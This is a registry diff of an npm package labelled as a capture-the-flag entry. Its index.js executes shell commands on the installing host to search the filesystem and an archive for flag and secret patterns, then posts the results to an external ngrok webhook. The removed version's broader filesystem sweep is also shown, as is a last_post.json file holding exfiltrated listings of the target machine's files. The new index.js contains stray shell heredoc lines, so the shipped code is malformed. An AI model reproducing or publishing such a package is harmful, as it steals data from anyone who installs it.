ect-987654-ctf 0.0.1 → 0.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/ect-987654-ctf-0.0.1.tgz +0 -0
- package/ect-987654-ctf-0.0.2.tgz +0 -0
- package/evil.yaml +1 -1
- package/index.js +34 -58
- package/last_post.json +1 -1
- package/package.json +1 -1
package/ect-987654-ctf-0.0.1.tgz
CHANGED
|
Binary file
|
|
Binary file
|
package/evil.yaml
CHANGED
package/index.js
CHANGED
|
@@ -1,76 +1,52 @@
|
|
|
1
|
+
cd ~/packagerce
|
|
2
|
+
|
|
3
|
+
cat > index.js <<'JS'
|
|
1
4
|
/*
|
|
2
|
-
|
|
5
|
+
Extractor: searches inside /home/node/aspect-node.tar.gz for flag patterns.
|
|
3
6
|
*/
|
|
4
7
|
const fs = require('fs');
|
|
5
8
|
const os = require('os');
|
|
6
9
|
const cp = require('child_process');
|
|
7
10
|
|
|
8
|
-
const WEBHOOK = "https://
|
|
11
|
+
const WEBHOOK = "https://ffa22146c145.ngrok-free.app/"; // your webhook
|
|
9
12
|
|
|
10
|
-
function
|
|
13
|
+
function send(payload){
|
|
11
14
|
try {
|
|
12
|
-
const
|
|
13
|
-
const
|
|
14
|
-
const
|
|
15
|
+
const data = JSON.stringify(payload);
|
|
16
|
+
const url = new URL(WEBHOOK);
|
|
17
|
+
const mod = url.protocol === 'https:' ? require('https') : require('http');
|
|
15
18
|
const opts = {
|
|
16
|
-
hostname:
|
|
17
|
-
port:
|
|
18
|
-
path:
|
|
19
|
+
hostname: url.hostname,
|
|
20
|
+
port: url.port || (url.protocol === 'https:' ? 443 : 80),
|
|
21
|
+
path: url.pathname,
|
|
19
22
|
method: 'POST',
|
|
20
|
-
headers: {'Content-Type':'application/json','Content-Length': Buffer.byteLength(
|
|
21
|
-
timeout: 10000
|
|
23
|
+
headers: {'Content-Type': 'application/json','Content-Length': Buffer.byteLength(data)}
|
|
22
24
|
};
|
|
23
|
-
const req =
|
|
24
|
-
req.on('error', ()=>{});
|
|
25
|
-
req.write(
|
|
26
|
-
req.end();
|
|
25
|
+
const req = mod.request(opts, res => {});
|
|
26
|
+
req.on('error', () => {});
|
|
27
|
+
req.write(data); req.end();
|
|
27
28
|
} catch(e){}
|
|
28
29
|
}
|
|
29
30
|
|
|
30
|
-
function run(cmd,
|
|
31
|
-
try {
|
|
32
|
-
|
|
33
|
-
return out.slice(0, max);
|
|
34
|
-
} catch(e){
|
|
35
|
-
try { return (e.stdout||'').toString().slice(0,max) || ('ERR:'+ (e.message||String(e))).slice(0,300); } catch(_) { return 'ERR'; }
|
|
36
|
-
}
|
|
31
|
+
function run(cmd, limit=20000){
|
|
32
|
+
try { return cp.execSync(cmd, {timeout: 10000}).toString().slice(0,limit); }
|
|
33
|
+
catch(e){ return (e.stdout||"ERR").toString().slice(0,limit); }
|
|
37
34
|
}
|
|
38
35
|
|
|
39
|
-
(function
|
|
40
|
-
const
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
payload.results.flagname_find = run("find / -xdev -type f \\( -iname '*flag*' -o -iname '*FLAG*' -o -iname '*secret*' -o -iname '*proof*' \\) -printf '%s\t%p\\n' 2>/dev/null | sort -nr | head -n 200", 30000);
|
|
52
|
-
|
|
53
|
-
// find files that contain 'HTB{' or 'flag{' (grep), limited
|
|
54
|
-
payload.results.grep_flags = run("grep -R --binary-files=without-match -I -n -e 'HTB{' -e 'flag{' / 2>/dev/null | head -n 200", 30000);
|
|
55
|
-
|
|
56
|
-
// top largest files (helps spot caches/backups that might include flags)
|
|
57
|
-
payload.results.top_large = run("find / -xdev -type f -printf '%s\\t%p\\n' 2>/dev/null | sort -nr | head -n 200", 30000);
|
|
58
|
-
|
|
59
|
-
// write full copy to /tmp on target for later inspection if accessible
|
|
60
|
-
try {
|
|
61
|
-
const outfull = JSON.stringify(payload, null, 2);
|
|
62
|
-
fs.writeFileSync('/tmp/ect_ls_results.txt', outfull);
|
|
63
|
-
} catch(e){}
|
|
64
|
-
|
|
65
|
-
// send trimmed payload to webhook
|
|
66
|
-
post({
|
|
67
|
-
host: payload.host,
|
|
68
|
-
ts: payload.ts,
|
|
69
|
-
summary: {
|
|
70
|
-
flagname_find_lines: payload.results.flagname_find.split(/\\r?\\n/).slice(0,40),
|
|
71
|
-
grep_flags_lines: payload.results.grep_flags.split(/\\r?\\n/).slice(0,40),
|
|
72
|
-
top_large_lines: payload.results.top_large.split(/\\r?\\n/).slice(0,40)
|
|
73
|
-
}
|
|
74
|
-
});
|
|
36
|
+
(function(){
|
|
37
|
+
const file = "/home/node/aspect-node.tar.gz";
|
|
38
|
+
let payload = {host: os.hostname(), ts: new Date().toISOString(), file, results: {}};
|
|
39
|
+
|
|
40
|
+
if (fs.existsSync(file)) {
|
|
41
|
+
// list contents
|
|
42
|
+
payload.results.list = run(`tar -tvf ${file} 2>/dev/null | head -n 200`, 15000);
|
|
43
|
+
// grep flag patterns inside archive
|
|
44
|
+
payload.results.grep = run(`tar -xOf ${file} 2>/dev/null | grep -aE 'HTB\\{|flag\\{|FLAG\\{' | head -n 50`, 15000);
|
|
45
|
+
} else {
|
|
46
|
+
payload.results.error = "File not found";
|
|
47
|
+
}
|
|
75
48
|
|
|
49
|
+
fs.writeFileSync("/tmp/ect_extract.txt", JSON.stringify(payload, null, 2));
|
|
50
|
+
send(payload);
|
|
76
51
|
})();
|
|
52
|
+
JS
|
package/last_post.json
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"host":"008ec3589c67","module":"ect-987654","found":false,"path":null,"flag":null,"ts":"2025-10-29T18:05:25.884Z"}
|
|
1
|
+
{"host":"978af335759b","ts":"2025-10-29T18:16:57.113Z","summary":{"flagname_find_lines":["14832\t/usr/share/perl5/Dpkg/BuildFlags.pm\n10842\t/usr/share/man/de/man1/dpkg-buildflags.1.gz\n10572\t/usr/share/man/fr/man1/dpkg-buildflags.1.gz\n10539\t/usr/share/man/nl/man1/dpkg-buildflags.1.gz\n10030\t/usr/share/man/pt/man1/dpkg-buildflags.1.gz\n10029\t/home/node/aspect-node/modules/npm-tracker/node_modules/_node-environment-flags@1.0.5@node-environment-flags/flags.json\n9719\t/usr/share/man/sv/man1/dpkg-buildflags.1.gz\n9418\t/usr/share/man/man1/dpkg-buildflags.1.gz\n8913\t/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c\n8335\t/usr/bin/dpkg-buildflags\n8253\t/usr/include/lzma/stream_flags.h\n7486\t/usr/lib/python3/dist-packages/mercurial/revlogutils/__pycache__/flagutil.cpython-311.pyc\n7467\t/usr/lib/python3/dist-packages/mercurial/revlogutils/flagutil.py\n6745\t/usr/include/x86_64-linux-gnu/asm/processor-flags.h\n4501\t/usr/include/linux/tty_flags.h\n3249\t/usr/share/man/man3/Dpkg::BuildFlags.3perl.gz\n3148\t/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/calc-dep-flags.js\n3027\t/home/node/aspect-node/modules/npm-tracker/node_modules/_mocha@6.2.3@mocha/lib/cli/node-flags.js\n3005\t/usr/lib/python3/dist-packages/mercurial/helptext/flags.txt\n2862\t/usr/lib/python3.11/__pycache__/secrets.cpython-311.pyc\n2822\t/usr/include/x86_64-linux-gnu/bits/termios-c_oflag.h\n2594\t/usr/include/x86_64-linux-gnu/bits/termios-c_lflag.h\n2028\t/usr/lib/python3.11/secrets.py\n1997\t/usr/include/x86_64-linux-gnu/bits/mman-map-flags-generic.h\n1936\t/usr/include/x86_64-linux-gnu/bits/termios-c_iflag.h\n1813\t/usr/share/dpkg/buildflags.mk\n1697\t/usr/include/x86_64-linux-gnu/bits/waitflags.h\n1415\t/usr/local/lib/node_modules/npm/node_modules/@colors/colors/lib/system/has-flag.js\n1230\t/usr/include/x86_64-linux-gnu/bits/termios-c_cflag.h\n1188\t/usr/include/x86_64-linux-gnu/bits/ss_flags.h\n1169\t/usr/share/man/man3/XtAppSetExitFlag.3.gz\n1101\t/home/node/aspect-node/modules/npm-tracker/node_modules/_es-abstract@1.22.3@es-abstract/2023/RegExpHasFlag.js\n1101\t/home/node/aspect-node/modules/npm-tracker/node_modules/_es-abstract@1.22.3@es-abstract/2022/RegExpHasFlag.js\n933\t/usr/share/man/man3/set_matchpathcon_flags.3.gz\n921\t/usr/local/lib/node_modules/npm/node_modules/tar/lib/get-write-flag.js\n900\t/usr/include/linux/kernel-page-flags.h\n816\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/bits/waitflags.ph\n644\t/home/node/aspect-node/modules/npm-tracker/node_modules/_moment@2.30.1@moment/src/lib/create/parsing-flags.js\n638\t/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/reset-dep-flags.js\n443\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/bits/ss_flags.ph\n370\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/modules/_flags.js\n370\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/library/modules/_flags.js\n314\t/home/node/aspect-node/modules/npm-tracker/node_modules/_prop-types@15.8.1@prop-types/lib/ReactPropTypesSecret.js\n201\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/modules/es6.regexp.flags.js\n149\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/library/fn/regexp/flags.js\n149\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/fn/regexp/flags.js\n0\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/modules/library/es6.regexp.flags.js\n0\t/home/node/aspect-node/modules/npm-tracker/node_modules/_core-js@2.6.12@core-js/library/modules/es6.regexp.flags.js\n"],"grep_flags_lines":["ERR:spawnSync /bin/sh ETIMEDOUT"],"top_large_lines":["90942048\t/usr/local/bin/node\n52358223\t/home/node/aspect-node.tar.gz\n35464168\t/usr/lib/gcc/x86_64-linux-gnu/12/cc1plus\n33342568\t/usr/lib/gcc/x86_64-linux-gnu/12/cc1\n31949128\t/usr/lib/gcc/x86_64-linux-gnu/12/lto1\n31945032\t/usr/bin/x86_64-linux-gnu-lto-dump-12\n31262256\t/usr/lib/x86_64-linux-gnu/libicudata.so.72.1\n31252892\t/usr/lib/x86_64-linux-gnu/libicudata.a\n16394944\t/usr/lib/x86_64-linux-gnu/libx265.so.199\n11676702\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/tsserver.js\n11615475\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/tsserverlibrary.js\n11087336\t/usr/lib/x86_64-linux-gnu/librsvg-2.so.2.48.0\n10945736\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/typescriptServices.js\n10945729\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/typescript.js\n10108128\t/usr/bin/sq\n9064210\t/usr/lib/x86_64-linux-gnu/libcrypto.a\n8281024\t/usr/lib/file/magic.mgc\n8198712\t/usr/lib/x86_64-linux-gnu/libasan.so.8.0.0\n8148122\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/typingsInstaller.js\n8086096\t/usr/lib/x86_64-linux-gnu/libicui18n.a\n7991800\t/usr/lib/x86_64-linux-gnu/libtsan.so.2.0.0\n7593896\t/home/node/aspect-node/modules/npm-tracker/node_modules/_jsdoctypeparser@3.1.0@jsdoctypeparser/tests/fixtures/definitely-typed-types\n6831704\t/usr/bin/python3.11\n6157210\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/tsc.js\n6030624\t/usr/lib/gcc/x86_64-linux-gnu/12/libstdc++.a\n5643672\t/usr/lib/x86_64-linux-gnu/libaom.so.3.6.0\n5445986\t/usr/lib/x86_64-linux-gnu/libc.a\n5306478\t/opt/yarn-v1.22.19/lib/cli.js\n5018334\t/usr/lib/x86_64-linux-gnu/libMagickCore-6.Q16.a\n4709656\t/usr/lib/x86_64-linux-gnu/libcrypto.so.3\n4699330\t/usr/lib/x86_64-linux-gnu/libgio-2.0.a\n4472989\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/CORE/charclass_invlists.h\n4336056\t/usr/lib/x86_64-linux-gnu/libdjvulibre.a\n4008514\t/usr/lib/x86_64-linux-gnu/libicuuc.a\n3823936\t/usr/lib/x86_64-linux-gnu/libperl.so.5.36.0\n3804432\t/usr/bin/perl5.36.0\n3804432\t/usr/bin/perl\n3660136\t/usr/lib/git-core/git\n3660136\t/usr/bin/git\n3391490\t/home/node/aspect-node/modules/npm-tracker/node_modules/_xml2js@0.6.2@xml2js/lib/xml2js.bc.js\n3307688\t/usr/lib/x86_64-linux-gnu/libicui18n.so.72.1\n3201312\t/usr/lib/x86_64-linux-gnu/libOpenEXR-3_1.so.30.5.1\n3138240\t/usr/bin/x86_64-linux-gnu-ld.gold\n3080764\t/usr/lib/gcc/x86_64-linux-gnu/12/libgcc.a\n3018450\t/usr/lib/x86_64-linux-gnu/libdb-5.3.a\n2995440\t/usr/lib/x86_64-linux-gnu/liblsan.so.0.0.0\n2815944\t/usr/lib/x86_64-linux-gnu/libMagickCore-6.Q16.so.6.0.0\n2815884\t/usr/lib/gcc/x86_64-linux-gnu/12/libasan.a\n2809470\t/usr/lib/x86_64-linux-gnu/libxml2.a\n2750712\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/auto/Encode/JP/JP.so\n2698304\t/usr/lib/x86_64-linux-gnu/libubsan.so.1.0.0\n2521592\t/usr/lib/x86_64-linux-gnu/libMagickWand-6.Q16.a\n2498152\t/usr/lib/x86_64-linux-gnu/libgprofng.so.0.0.0\n2442625\t/home/node/aspect-node/modules/npm-tracker/node_modules/_@ali_maven@1.0.2@@ali/maven/lib/guava-20.0.jar\n2414840\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/auto/Encode/KR/KR.so\n2408297\t/usr/share/mime/packages/freedesktop.org.xml\n2368780\t/usr/lib/gcc/x86_64-linux-gnu/12/libtsan.a\n2334452\t/usr/lib/x86_64-linux-gnu/libsqlite3.a\n2296726\t/usr/lib/x86_64-linux-gnu/libm-2.36.a\n2280734\t/usr/lib/x86_64-linux-gnu/libcairo.a\n2249584\t/usr/lib/x86_64-linux-gnu/libglib-2.0.a\n2213808\t/usr/lib/x86_64-linux-gnu/libfftw3.so.3.6.10\n2200240\t/tmp/v8-compile-cache-0/10.2.154.26-node.26/zSoptzSyarn-v1.22.19zSbinzSyarn.js.BLOB\n2197240\t/usr/lib/x86_64-linux-gnu/libgnutls.so.30.34.3\n2190896\t/usr/lib/x86_64-linux-gnu/libdns-9.18.19-1~deb12u1-Debian.so\n2190440\t/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30\n2185986\t/usr/local/lib/node_modules/corepack/dist/corepack.js\n2179456\t/usr/lib/git-core/git-remote-http\n2171232\t/usr/lib/git-core/git-http-push\n2170984\t/usr/lib/git-core/scalar\n2170984\t/usr/bin/scalar\n2166992\t/home/node/aspect-node/modules/npm-tracker/node_modules/_@ali_maven@1.0.2@@ali/maven/lib/wagon-http-2.12-shaded.jar\n2163392\t/usr/lib/git-core/git-imap-send\n2158912\t/usr/lib/git-core/git-http-fetch\n2157722\t/usr/lib/x86_64-linux-gnu/libX11.a\n2156216\t/usr/lib/x86_64-linux-gnu/libisl.so.23.2.0\n2155535\t/root/.npm/_cacache/content-v2/sha512/ae/91/d357e36eaffd0d23b36ca0571a005f4ffdc7960f43ef1ab072c46b25ffb9d8c99a975cac2214693a4ba1af4fe5f4385f8c1acbeb6a37f41dbb70773441f9\n2129696\t/usr/lib/git-core/git-daemon\n2125728\t/usr/lib/git-core/git-http-backend\n2117216\t/usr/lib/git-core/git-shell\n2117216\t/usr/bin/git-shell\n2117120\t/usr/lib/git-core/git-sh-i18n--envsubst\n2099448\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/auto/Encode/CN/CN.so\n2078888\t/usr/lib/x86_64-linux-gnu/libicuuc.so.72.1\n2067760\t/usr/lib/x86_64-linux-gnu/libapt-pkg.so.6.0.0\n2029816\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/auto/Encode/TW/TW.so\n1944816\t/usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.7400.6\n1939332\t/usr/share/perl/5.36.0/Unicode/Collate/allkeys.txt\n1922136\t/usr/lib/x86_64-linux-gnu/libc.so.6\n1880736\t/usr/bin/x86_64-linux-gnu-dwp\n1843792\t/usr/lib/x86_64-linux-gnu/libdb-5.3.so\n1792040\t/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0\n1754040\t/usr/lib/x86_64-linux-gnu/libdjvulibre.so.21.7.0\n1750500\t/usr/lib/x86_64-linux-gnu/libmvec.a\n1750104\t/usr/lib/x86_64-linux-gnu/libxml2.so.2.9.14\n1585152\t/usr/lib/x86_64-linux-gnu/libdav1d.so.6.6.0\n1579352\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/auto/Unicode/Collate/Collate.so\n1542995\t/usr/share/doc/libharfbuzz0b/changelog.gz\n1538992\t/usr/lib/x86_64-linux-gnu/libsepol.a\n1514448\t/usr/lib/x86_64-linux-gnu/libbfd-2.40-system.so\n1437848\t/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6\n1414420\t/usr/lib/x86_64-linux-gnu/libcurl.a\n1405964\t/home/node/aspect-node/modules/npm-tracker/node_modules/_ali-oss@6.18.1@ali-oss/dist/aliyun-oss-sdk.js\n1351137\t/home/node/aspect-node/modules/npm-tracker/node_modules/_@babel_parser@7.23.6@@babel/parser/lib/index.js.map\n1340001\t/usr/lib/python3/dist-packages/mercurial/locale/pt_BR/LC_MESSAGES/hg.mo\n1336592\t/usr/bin/x86_64-linux-gnu-ld.bfd\n1332480\t/usr/lib/x86_64-linux-gnu/libgcrypt.so.20.4.1\n1325176\t/usr/lib/x86_64-linux-gnu/gprofng/libgp-collector.so\n1318408\t/usr/lib/x86_64-linux-gnu/libX11.so.6.4.0\n1305592\t/usr/bin/x86_64-linux-gnu-g++-12\n1301496\t/usr/bin/x86_64-linux-gnu-gcc-12\n1301496\t/usr/bin/x86_64-linux-gnu-cpp-12\n1273360\t/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0.7400.6\n1265648\t/usr/bin/bash\n1261376\t/usr/lib/x86_64-linux-gnu/libp11-kit.so.0.3.0\n1238120\t/usr/lib/x86_64-linux-gnu/libgmp.a\n1230436\t/usr/lib/x86_64-linux-gnu/libssl.a\n1203192\t/usr/lib/x86_64-linux-gnu/libMagickWand-6.Q16.so.6.0.0\n1201094\t/usr/lib/python3/dist-packages/mercurial/locale/ja/LC_MESSAGES/hg.mo\n1187432\t/usr/lib/x86_64-linux-gnu/libcairo.so.2.11600.0\n1180024\t/usr/lib/gcc/x86_64-linux-gnu/12/lto-wrapper\n1160080\t/usr/lib/python3/dist-packages/mercurial/locale/ru/LC_MESSAGES/hg.mo\n1137724\t/usr/lib/x86_64-linux-gnu/libfreetype.a\n1125408\t/usr/bin/ssh\n1122477\t/usr/share/perl/5.36.0/unicore/Name.pl\n1108440\t/usr/bin/gpg\n1103463\t/home/node/aspect-node/modules/npm-tracker/node_modules/_language-subtag-registry@0.3.22@language-subtag-registry/data/json/registry.json\n1064504\t/usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.60000.0\n1033730\t/usr/lib/gcc/x86_64-linux-gnu/12/liblsan.a\n1029037\t/home/node/aspect-node/modules/npm-tracker/node_modules/_axe-core@4.7.0@axe-core/axe.js\n1019408\t/usr/lib/x86_64-linux-gnu/libmvec.so.1\n982796\t/usr/share/perl/5.36.0/Module/CoreList.pm\n978784\t/usr/sbin/ldconfig\n976616\t/usr/bin/openssl\n965960\t/usr/share/doc/git/changelog.gz\n965960\t/usr/share/doc/git-man/changelog.gz\n956508\t/usr/lib/x86_64-linux-gnu/libLerc.a\n943420\t/usr/lib/gcc/x86_64-linux-gnu/12/libubsan.a\n936960\t/usr/lib/x86_64-linux-gnu/libzstd.a\n932120\t/usr/bin/gpgcompose\n926156\t/usr/lib/x86_64-linux-gnu/libtiff.a\n918952\t/usr/bin/x86_64-linux-gnu-as\n907784\t/usr/lib/x86_64-linux-gnu/libm.so.6\n899873\t/usr/share/locale/bg/LC_MESSAGES/git.mo\n898146\t/usr/lib/x86_64-linux-gnu/libpixman-1.a\n895128\t/usr/lib/x86_64-linux-gnu/libopcodes-2.40-system.so\n888080\t/usr/lib/x86_64-linux-gnu/libkrb5.so.3.3\n855251\t/var/cache/debconf/templates.dat\n840632\t/usr/lib/x86_64-linux-gnu/libsystemd.so.0.35.0\n839320\t/usr/lib/x86_64-linux-gnu/libjemalloc.so.2\n835038\t/usr/lib/x86_64-linux-gnu/libjpeg.a\n829188\t/usr/lib/x86_64-linux-gnu/libblkid.a\n825256\t/usr/lib/x86_64-linux-gnu/libfreetype.so.6.18.3\n824334\t/usr/share/doc/liblcms2-dev/LittleCMS2.14 API.pdf.gz\n816787\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/lib.dom.d.ts\n805537\t/var/cache/debconf/templates.dat-old\n790792\t/usr/lib/x86_64-linux-gnu/libpcre2-8.a\n788832\t/usr/lib/x86_64-linux-gnu/libsvn_wc-1.so.1.0.0\n769604\t/usr/lib/x86_64-linux-gnu/libwebp.a\n769408\t/usr/bin/x86_64-linux-gnu-readelf\n764192\t/usr/lib/x86_64-linux-gnu/libsepol.so.2\n763816\t/usr/lib/x86_64-linux-gnu/libzstd.so.1.5.4\n762256\t/usr/lib/x86_64-linux-gnu/libmpfr.so.6.2.0\n759720\t/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\n756209\t/usr/lib/python3.11/pydoc_data/topics.py\n746982\t/usr/share/locale/uk/LC_MESSAGES/gas.mo\n742114\t/usr/lib/x86_64-linux-gnu/libgobject-2.0.a\n737440\t/usr/bin/x86_64-linux-gnu-gcov-12\n736538\t/usr/lib/x86_64-linux-gnu/libpcre2-16.a\n729789\t/home/node/aspect-node/modules/npm-tracker/node_modules/_aliyun-sdk@1.12.10@aliyun-sdk/dist/aliyun-sdk.js\n725665\t/usr/share/locale/ru/LC_MESSAGES/gas.mo\n721681\t/usr/share/doc/zlib1g-dev/crc-doc.1.0.pdf.gz\n721270\t/home/node/aspect-node/modules/npm-tracker/node_modules/_rxjs@6.6.7@rxjs/bundles/rxjs.umd.js.map\n716216\t/usr/lib/x86_64-linux-gnu/libcurl.so.4.8.0\n708920\t/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\n708520\t/usr/lib/x86_64-linux-gnu/libpcre2-32.a\n708154\t/usr/lib/gcc/x86_64-linux-gnu/12/libstdc++fs.a\n699692\t/usr/share/locale/vi/LC_MESSAGES/git.mo\n698384\t/usr/lib/x86_64-linux-gnu/libpixman-1.so.0.42.2\n695736\t/usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4.8.0\n692256\t/usr/lib/x86_64-linux-gnu/libssl.so.3\n687396\t/usr/lib/x86_64-linux-gnu/libXt.a\n678384\t/usr/lib/python3/dist-packages/mercurial/zstd.cpython-311-x86_64-linux-gnu.so\n670156\t/usr/share/locale/de/LC_MESSAGES/git.mo\n669831\t/usr/share/locale/fr/LC_MESSAGES/git.mo\n664868\t/usr/share/locale/ca/LC_MESSAGES/git.mo\n664400\t/usr/lib/x86_64-linux-gnu/libbrotlienc.a\n661952\t/usr/bin/ssh-keygen\n660384\t/home/node/aspect-node/modules/npm-tracker/node_modules/_typescript@4.9.5@typescript/lib/tsserverlibrary.d.ts\n659312\t/usr/lib/x86_64-linux-gnu/perl/5.36.0/auto/re/re.so\n659312\t/usr/lib/x86_64-linux-gnu/perl-base/auto/re/re.so\n657390\t/usr/lib/x86_64-linux-gnu/libreadline.a\n657073\t/usr/share/doc/sudo/changelog.gz\n653888\t/usr/lib/openssh/ssh-keysign\n652069\t/usr/share/locale/tr/LC_MESSAGES/git.mo\n640766\t/usr/share/locale/es/LC_MESSAGES/git.mo\n639192\t/usr/lib/gcc/x86_64-linux-gnu/12/collect2\n637144\t/usr/lib/x86_64-linux-gnu/libheif.so.1.15.1\n637136\t/usr/lib/x86_64-linux-gnu/libsvn_client-1.so.1.0.0\n635303\t/home/node/aspect-node/modules/npm-tracker/node_modules/_uglify-js@3.17.4@uglify-js/lib/compress.js\n"]}}
|